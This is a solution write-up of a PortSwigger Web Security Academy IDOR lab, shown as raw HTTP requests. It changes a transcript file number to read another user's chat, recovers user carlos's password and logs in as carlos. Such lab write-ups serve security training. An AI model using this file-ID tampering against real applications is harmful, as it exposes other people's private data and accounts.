Port Swigger Insecure direct object references
Insecure direct object references
Solution
Start chat with bot
GET /chat HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /download-transcript HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------52388940231597668561058974223
Content-Length: 342
Origin: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
-----------------------------52388940231597668561058974223
Content-Disposition: form-data; name="transcript"
CONNECTED: -- Now chatting with Hal Pline --<br/>You: hacker here<br/>Hal Pline: What did your last slave machine die of?<br/>You: test 123<br/>Hal Pline: Who cares?
-----------------------------52388940231597668561058974223--
Edit request to download transcript - chat
Edit request: from /download-transcript/2.txt to /download-transcript/1.txt and read history from last chat
Found password for user carlos: ugmh9g5jmwkzx7iyqtmv
---
GET /download-transcript/2.txt HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
___
GET /download-transcript/1.txt HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
---
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520
CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is ugmh9g5jmwkzx7iyqtmv. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!
Login to panel for user: carlos
L: carlos
P: ugmh9g5jmwkzx7iyqtmv
---
POST /login HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=MrlUm5lkCUdINXWtpDVRToYzY9dY9rym&username=carlos&password=ugmh9g5jmwkzx7iyqtmv
---
GET /my-account?id=carlos HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=50ByzSiSnfE2R0vMU6c3gmuAcLJhqsZz
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved